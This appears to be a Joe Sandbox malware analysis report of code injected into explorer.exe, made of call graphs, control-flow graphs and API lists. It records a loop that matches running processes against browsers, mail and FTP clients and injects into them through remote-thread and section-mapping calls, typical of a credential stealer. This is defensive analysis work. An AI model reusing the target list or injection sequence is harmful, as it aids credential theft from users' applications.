CloseHandle 776->778 779 8110c lstrcmpi 776->779 777->775 778->777 780 81124 lstrcmpi 779->780 790 81280 779->790 782 81138 lstrcmpi 780->782 780->790 783 8114c lstrcmpi 782->783 782->790 784 81160 lstrcmpi 783->784 783->790 786 81170 lstrcmpi 784->786 784->790 785 81305 Process32Next 785->779 787 81319 785->787 788 81184 lstrcmpi 786->788 786->790 787->778 789 81198 lstrcmpi 788->789 788->790 789->790 791 811ac lstrcmpi 789->791 790->785 795 82608 VirtualQuery 790->795 798 812ae lstrcmpi 790->798 835 825ad OpenProcess 790->835 841 81819 790->841 791->790 792 811c0 lstrcmpi 791->792 792->790 793 811d4 lstrcmpi 792->793 793->790 794 811e8 lstrcmpi 793->794 794->790 796 811fc lstrcmpi 794->796 795->790 796->790 797 8120c lstrcmpi 796->797 797->790 799 8121c lstrcmpi 797->799 798->790 799->790 800 8122c lstrcmpi 799->800 800->790 801 8123c lstrcmpi 800->801 801->790 803 8124c lstrcmpi 801->803 803->790 804 8125c lstrcmpi 803->804 804->790 805 8126c lstrcmpi 804->805 805->785 805->790 806->733 887 82861 GetProcessHeap RtlAllocateHeap 807->887 809 81340 GetModuleFileNameA 888 82861 GetProcessHeap RtlAllocateHeap 809->888 811 81357 GetCurrentProcessId wsprintfA 889 8263e CryptAcquireContextA 811->889 814 8139c Sleep 894 824d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 8140d 912 82843 815->912 818 813ae GetModuleHandleA GetProcAddress 820 813c9 818->820 821 813da GetModuleHandleA GetProcAddress 818->821 902 81de3 820->902 824 813f5 821->824 825 81406 821->825 822 82843 3 API calls 826 8141b RtlExitUserThread 822->826 827 81de3 3 API calls 824->827 828 824d5 10 API calls 825->828 829 81425 826->829 827->825 828->815 830 82608 VirtualQuery 829->830 832 8144b 829->832 831 8143a 830->831 831->832 917 81493 831->917 832->729 834->774 836 825cb IsWow64Process 835->836 837 82600 835->837 838 825dc IsWow64Process 836->838 839 825ee 836->839 837->790 838->839 840 825f9 CloseHandle 838->840 839->840 840->837 842 82608 VirtualQuery 841->842 843 81833 842->843 844 81845 OpenProcess 843->844 845 81a76 843->845 844->845 846 8185e 844->846 845->790 847 82608 VirtualQuery 846->847 848 81865 847->848 848->845 849 8188f 848->849 850 81873 NtSetInformationProcess 848->850 872 81a80 849->872 850->849 853 81a80 2 API calls 854 818d6 853->854 855 81a73 CloseHandle 854->855 856 81a80 2 API calls 854->856 855->845 857 81900 856->857 878 81b17 857->878 860 81a80 2 API calls 861 81930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 81a4e CreateRemoteThread 861->862 863 81985 861->863 864 81a65 CloseHandle 862->864 865 8198b CreateMutexA GetLastError 863->865 868 819bb GetModuleHandleA GetProcAddress ReadProcessMemory 863->868 866 81a67 CloseHandle CloseHandle 864->866 865->863 867 819a7 CloseHandle Sleep 865->867 866->855 867->865 869 819ec WriteProcessMemory 868->869 870 81a47 868->870 869->870 871 81a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->864 870->866 871->870 873 81a94 872->873 875 818b4 872->875 874 81aa4 NtCreateSection 873->874 876 81ac3 873->876 874->876 875->853 876->875 877 81ad8 NtMapViewOfSection 876->877 877->875 879 81b2e 878->879 885 81b60 878->885 880 81b30 RtlMoveMemory 879->880 880->880 880->885 881 81bc3 882 81910 NtUnmapViewOfSection 881->882 884 81be1 LdrProcessRelocationBlock 881->884 882->860 883 81b71 LoadLibraryA 883->882 883->885 884->881 884->882 885->881 885->883 886 81ba1 GetProcAddress 885->886 886->882 886->885 887->809 888->811 890 81384 CreateMutexA GetLastError 889->890 891 82664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 826aa wsprintfA 891->892 892->892 893 826cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 82515 894->895 896 82565 CloseHandle 895->896 897 82555 Thread32Next 895->897 898 82521 OpenThread 895->898 896->818 897->895 899 8253c SuspendThread 898->899 900 82544 ResumeThread 898->900 901 8254a CloseHandle 899->901 900->901 901->897 903 81ded 902->903 911 81e56 902->911 903->911 944 81e93 VirtualProtect 903->944 905 81e04 905->911 945 82815 VirtualAlloc 905->945 907 81e10 908 81e1a RtlMoveMemory 907->908 910 81e2d 907->910 908->910 946 81e93 VirtualProtect 910->946 911->821 913 82608 VirtualQuery 912->913 914 8284b 913->914 915 81414 914->915 916 8284f GetProcessHeap HeapFree 914->916 915->822 916->915 918 814c0 917->918 919 814a1 917->919 921 814c8 918->921 922 81510 918->922 947 817c7 919->947 924 817c7 5 API calls 921->924 940 814b6 921->940 966 826e6 lstrlen lstrlen 922->966 926 814e0 924->926 926->940 954 81647 926->954 927 8155f 928 826e6 2 API calls 927->928 931 8156c 928->931 930 81532 968 81752 GetModuleHandleA GetProcAddress 930->968 933 815a0 931->933 934 81584 931->934 931->940 938 82404 5 API calls 933->938 933->940 971 82404 lstrlen 934->971 941 815ac 938->941 939 81647 11 API calls 939->940 940->832 941->940 942 81647 11 API calls 941->942 943 814fb 942->943 943->940 977 815e0 943->977 944->905 945->907 946->911 948 817d1 947->948 951 81812 947->951 949 826e6 2 API calls 948->949 948->951 950 817f1 949->950 950->951 982 82861 GetProcessHeap RtlAllocateHeap 950->982 951->940 953 81804 RtlMoveMemory 953->951 955 81660 954->955 965 81745 954->965 956 81671 lstrlen 955->956 955->965 957 81683 lstrlen 956->957 956->965 958 81690 getpeername 957->958 957->965 959 816ae inet_ntoa htons 958->959 958->965 963 816cc 959->963 959->965 961 81717 wsprintfA 962 8173a 961->962 964 82843 3 API calls 962->964 962->965 963->965 983 82861 GetProcessHeap RtlAllocateHeap 963->983 964->965 965->943 967 8151d 966->967 967->927 967->930 969 81539 968->969 970 81776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->970 969->939 969->940 970->969 972 8241c CryptStringToBinaryA 971->972 973 82456 971->973 972->973 974 82438 972->974 973->940 984 82861 GetProcessHeap RtlAllocateHeap 974->984 976 82444 CryptStringToBinaryA 976->973 978 82843 3 API calls 977->978 979 815f5 978->979 980 82843 3 API calls 979->980 981 815fc 980->981 981->940 982->953 983->961 984->976 998 81425 999 8144b 998->999 1000 81432 998->1000 1001 82608 VirtualQuery 1000->1001 1002 8143a 1001->1002 1002->999 1003 81493 23 API calls 1002->1003 1003->999 1004 82806 VirtualFree 1005 81eb6 1006 81ed9 1005->1006 1007 81ecc lstrlen 1005->1007 1016 82861 GetProcessHeap RtlAllocateHeap 1006->1016 1007->1006 1009 81ee1 lstrcat 1010 81f1d 1009->1010 1011 81f16 lstrcat 1009->1011 1017 81f4a 1010->1017 1011->1010 1014 82843 3 API calls 1015 81f40 1014->1015 1016->1009 1051 822b8 1017->1051 1021 81f77 1056 827e2 lstrlen MultiByteToWideChar 1021->1056 1023 81f86 1057 82374 RtlZeroMemory 1023->1057 1026 81fd8 RtlZeroMemory 1028 8200d 1026->1028 1027 82843 3 API calls 1029 81f2d 1027->1029 1032 8229a 1028->1032 1034 8203b 1028->1034 1059 822e5 1028->1059 1029->1014 1031 82280 1031->1032 1033 82843 3 API calls 1031->1033 1032->1027 1033->1032 1034->1031 1068 82861 GetProcessHeap RtlAllocateHeap 1034->1068 1036 8210b wsprintfW 1037 82131 1036->1037 1041 8219e 1037->1041 1069 82861 GetProcessHeap RtlAllocateHeap 1037->1069 1039 8216b wsprintfW 1039->1041 1040 8225d 1042 82843 3 API calls 1040->1042 1041->1040 1070 82861 GetProcessHeap RtlAllocateHeap 1041->1070 1044 82271 1042->1044 1044->1031 1045 82843 3 API calls 1044->1045 1045->1031 1046 821e9 1047 82256 1046->1047 1071 82815 VirtualAlloc 1046->1071 1049 82843 3 API calls 1047->1049 1049->1040 1050 82243 RtlMoveMemory 1050->1047 1052 81f69 1051->1052 1053 822c2 1051->1053 1055 82861 GetProcessHeap RtlAllocateHeap 1052->1055 1054 826e6 2 API calls 1053->1054 1054->1052 1055->1021 1056->1023 1058 81f96 1057->1058 1058->1026 1058->1032 1061 822f2 1059->1061 1062 82353 1059->1062 1060 822f6 DnsQuery_W 1060->1061 1061->1060 1061->1062 1063 82335 DnsFree inet_ntoa 1061->1063 1062->1034 1063->1061 1064 82355 1063->1064 1072 82861 GetProcessHeap RtlAllocateHeap 1064->1072 1066 8235f 1073 827e2 lstrlen MultiByteToWideChar 1066->1073 1068->1036 1069->1039 1070->1046 1071->1050 1072->1066 1073->1062

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00082608 1 Function_00081F4A 7 Function_00082843 1->7 21 Function_00082815 1->21 30 Function_00082861 1->30 31 Function_000827E2 1->31 35 Function_000822E5 1->35 37 Function_000822B8 1->37 39 Function_00082731 1->39 42 Function_00082374 1->42 2 Function_00081A80 3 Function_00081DC0 13 Function_00081C19 3->13 4 Function_00081D80 4->13 5 Function_00081000 22 Function_00081016 5->22 6 Function_00082841 7->0 8 Function_00082404 8->30 9 Function_00082806 10 Function_00081647 10->7 28 Function_000824AE 10->28 10->30 11 Function_000817C7 11->30 36 Function_000826E6 11->36 12 Function_00081819 12->0 12->2 23 Function_00081B17 12->23 14 Function_00081E5D 14->4 15 Function_0008245E 15->30 16 Function_00082592 17 Function_00081752 18 Function_00081493 18->8 18->10 18->11 18->17 29 Function_000815E0 18->29 18->36 19 Function_00081E93 20 Function_000824D5 22->0 22->12 22->16 27 Function_000825AD 22->27 22->30 33 Function_000810A4 22->33 22->39 40 Function_00081332 22->40 41 Function_00082573 22->41 24 Function_00083417 25 Function_00087728 26 Function_00081469 26->0 26->18 29->7 32 Function_00081DE3 32->3 32->14 32->19 32->21 33->0 33->12 33->16 33->27 33->30 33->39 33->41 34 Function_00081425 34->0 34->18 35->30 35->31 37->36 38 Function_0008263E 40->0 40->7 40->18 40->20 40->30 40->32 40->38 43 Function_00081EB6 43->1 43->7 43->30

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 81016-81020 call 82608 3 81022-8104b call 82861 RtlMoveMemory 0->3 4 81097-81098 0->4 7 8104d-8106b call 82861 RtlMoveMemory 3->7 8 81071-81090 NtUnmapViewOfSection GetCurrentProcessId 3->8 7->8 10 8109e-810d7 call 810a4 call 82861 8->10 11 81092-81093 8->11 21 810dc-810ea CreateToolhelp32Snapshot 10->21 11->4 12 81095-81099 call 81332 11->12 12->10 22 810f0-81106 Process32First 21->22 23 81322-8132d Sleep 21->23 24 8131b-8131c CloseHandle 22->24 25 8110c-8111e lstrcmpi 22->25 23->21 24->23 26 81280-81289 call 825ad 25->26 27 81124-81132 lstrcmpi 25->27 33 8128b-81294 call 82592 26->33 34 81305-81313 Process32Next 26->34 27->26 29 81138-81146 lstrcmpi 27->29 29->26 31 8114c-8115a lstrcmpi 29->31 31->26 32 81160-8116a lstrcmpi 31->32 32->26 35 81170-8117e lstrcmpi 32->35 33->34 41 81296-8129d call 82573 33->41 34->25 36 81319 34->36 35->26 38 81184-81192 lstrcmpi 35->38 36->24 38->26 40 81198-811a6 lstrcmpi 38->40 40->26 42 811ac-811ba lstrcmpi 40->42 41->34 47 8129f-812ac call 82608 41->47 42->26 44 811c0-811ce lstrcmpi 42->44 44->26 46 811d4-811e2 lstrcmpi 44->46 46->26 48 811e8-811f6 lstrcmpi 46->48 47->34 53 812ae-81300 lstrcmpi call 82731 call 81819 call 82731 47->53 48->26 50 811fc-8120a lstrcmpi 48->50 50->26 52 8120c-8121a lstrcmpi 50->52 52->26 54 8121c-8122a lstrcmpi 52->54 53->34 54->26 56 8122c-8123a lstrcmpi 54->56 56->26 58 8123c-8124a lstrcmpi 56->58 58->26 61 8124c-8125a lstrcmpi 58->61 61->26 63 8125c-8126a lstrcmpi 61->63 63->26 64 8126c-8127a lstrcmpi 63->64 64->26 64->34
                                  APIs
                                    • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                    • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                    • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106B
                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081074
                                  • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107A
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                  • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                  • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                  • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                  • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                  • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                  • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                  • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                  • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                  • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                  • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                  • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                  • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                  • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                  • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                  • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                  • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                  • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                  • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                  • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                  • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                  • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                  • Sleep.KERNELBASE(000003E8), ref: 00081327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                  • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                  • API String ID: 2555639992-1680033604
                                  • Opcode ID: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                  • Instruction ID: c6fb3a315111370b2d623b8f7e562b9d3a4c86b5ba4b7d63d824c8c2a37431fe
                                  • Opcode Fuzzy Hash: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                  • Instruction Fuzzy Hash: F9719330604305ABDB50FBB19C49EAE7BECBF85B90B040529FAC1C7191EB75DA068B65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 65 810a4-810d7 call 82861 68 810dc-810ea CreateToolhelp32Snapshot 65->68 69 810f0-81106 Process32First 68->69 70 81322-8132d Sleep 68->70 71 8131b-8131c CloseHandle 69->71 72 8110c-8111e lstrcmpi 69->72 70->68 71->70 73 81280-81289 call 825ad 72->73 74 81124-81132 lstrcmpi 72->74 80 8128b-81294 call 82592 73->80 81 81305-81313 Process32Next 73->81 74->73 76 81138-81146 lstrcmpi 74->76 76->73 78 8114c-8115a lstrcmpi 76->78 78->73 79 81160-8116a lstrcmpi 78->79 79->73 82 81170-8117e lstrcmpi 79->82 80->81 88 81296-8129d call 82573 80->88 81->72 83 81319 81->83 82->73 85 81184-81192 lstrcmpi 82->85 83->71 85->73 87 81198-811a6 lstrcmpi 85->87 87->73 89 811ac-811ba lstrcmpi 87->89 88->81 94 8129f-812ac call 82608 88->94 89->73 91 811c0-811ce lstrcmpi 89->91 91->73 93 811d4-811e2 lstrcmpi 91->93 93->73 95 811e8-811f6 lstrcmpi 93->95 94->81 100 812ae-81300 lstrcmpi call 82731 call 81819 call 82731 94->100 95->73 97 811fc-8120a lstrcmpi 95->97 97->73 99 8120c-8121a lstrcmpi 97->99 99->73 101 8121c-8122a lstrcmpi 99->101 100->81 101->73 103 8122c-8123a lstrcmpi 101->103 103->73 105 8123c-8124a lstrcmpi 103->105 105->73 108 8124c-8125a lstrcmpi 105->108 108->73 110 8125c-8126a lstrcmpi 108->110 110->73 111 8126c-8127a lstrcmpi 110->111 111->73 111->81
                                  APIs
                                    • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                    • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                  • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                  • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                  • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                  • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                  • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                  • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                  • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                  • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                  • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                  • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                  • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                  • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                  • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                  • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                  • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                  • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                  • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                  • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                  • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                  • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                  • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                  • Sleep.KERNELBASE(000003E8), ref: 00081327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                  • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                  • API String ID: 3950187957-1680033604
                                  • Opcode ID: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                  • Instruction ID: 92ea90e728a065c3b10ee3f836ed5eb5e8a8dda0ab9d7eab971388ade25db994
                                  • Opcode Fuzzy Hash: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                  • Instruction Fuzzy Hash: 79517270604305A7DB50FBB18C85EAF7AECBF85B90B040939FAC1D6081EB64DA068B75

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 112 87728-87745 113 8774b-87758 112->113 114 8790d 112->114 115 8776a-8776f 113->115 114->114 116 87771 115->116 117 87760-87765 116->117 118 87773 116->118 119 87766-87768 117->119 120 87778-8777a 118->120 119->115 119->116 121 8777c-87781 120->121 122 87783-87787 120->122 121->122 122->120 123 87789 122->123 124 8778b-87792 123->124 125 87794-87799 123->125 124->120 124->125 126 877a8-877aa 125->126 127 8779b-877a4 125->127 130 877ac-877b1 126->130 131 877b3-877b7 126->131 128 8781a-8781d 127->128 129 877a6 127->129 134 87822-87825 128->134 129->126 130->131 132 877b9-877be 131->132 133 877c0-877c2 131->133 132->133 136 877e4-877f3 133->136 137 877c4 133->137 135 87827-87829 134->135 135->134 138 8782b-8782e 135->138 140 87804-87811 136->140 141 877f5-877fc 136->141 139 877c5-877c7 137->139 138->134 142 87830-8784c 138->142 143 877c9-877ce 139->143 144 877d0-877d4 139->144 140->140 146 87813-87815 140->146 141->141 145 877fe 141->145 142->135 147 8784e 142->147 143->144 144->139 148 877d6 144->148 145->119 146->119 149 87854-87858 147->149 150 877d8-877df 148->150 151 877e1 148->151 152 8785a-87870 LoadLibraryA 149->152 153 8789f-878a2 149->153 150->139 150->151 151->136 154 87871-87876 152->154 155 878a5-878ac 153->155 154->149 156 87878-8787a 154->156 157 878ae-878b0 155->157 158 878d0-87900 VirtualProtect * 2 155->158 160 8787c-87882 156->160 161 87883-87890 GetProcAddress 156->161 162 878b2-878c1 157->162 163 878c3-878ce 157->163 159 87904-87908 158->159 159->159 164 8790a 159->164 160->161 165 87899-8789c 161->165 166 87892-87897 161->166 162->155 163->162 164->114 166->154
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000086000.00000040.80000000.00040000.00000000.sdmp, Offset: 00086000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_86000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                  • Instruction ID: 9b19febec4c14d8985e07823db6ea8ccfd6019d3ec10bd7ab69b27837b6b85f3
                                  • Opcode Fuzzy Hash: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                  • Instruction Fuzzy Hash: FF512B7194C3918FD722AA78CC847B57BE0FB52320B390679C5E9CB3CAEB949805C761

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 167 82861-82871 GetProcessHeap RtlAllocateHeap
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                  • Instruction ID: 77588290d4e37ef700697110175aaff6c1c57f9cd16726c1ee75de6bd7924a5a
                                  • Opcode Fuzzy Hash: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                  • Instruction Fuzzy Hash: 8CA002715502507FFD4557A4FD1DF557A19B7C5B11F0045447189C50609968554C9F21

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 0008184E
                                  • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00081889
                                  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00081919
                                  • RtlMoveMemory.NTDLL(00000000,00083428,00000016), ref: 00081940
                                  • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081968
                                  • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081978
                                  • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081992
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0008199A
                                  • CloseHandle.KERNEL32(00000000), ref: 000819A8
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819AF
                                  • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000819C5
                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819CC
                                  • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000819E2
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A0C
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081A1F
                                  • CloseHandle.KERNEL32(00000000), ref: 00081A26
                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A2D
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A41
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081A58
                                  • CloseHandle.KERNEL32(00000000), ref: 00081A65
                                  • CloseHandle.KERNEL32(?), ref: 00081A6B
                                  • CloseHandle.KERNEL32(?), ref: 00081A71
                                  • CloseHandle.KERNEL32(00000000), ref: 00081A74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                  • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                  • API String ID: 1066286714-4141090125
                                  • Opcode ID: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                  • Instruction ID: 9f5633c6449d72ef76d13a6fe6a98af6d308b0c36e19ae64f2dd6a10d85f2928
                                  • Opcode Fuzzy Hash: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                  • Instruction Fuzzy Hash: 47618E31105304AFE710EF65DC84EABBBECFF89B54F000519F989D6291DA74DA058B62

                                  Control-flow Graph

                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                  • lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                  • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                  • wsprintfA.USER32 ref: 000826B6
                                  • CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                  • String ID: %02X
                                  • API String ID: 3341110664-436463671
                                  • Opcode ID: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                  • Instruction ID: 6f7decda94893415d9c613d86727ea4291130fd5527fc19c423d8df5fa7bf1f8
                                  • Opcode Fuzzy Hash: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                  • Instruction Fuzzy Hash: D51128B1A00108BFEB119B95EC98EAEBFBCFB88B41F104065F645E2160D6758F119B60

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                    • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0008109E,?,00081010), ref: 0008134A
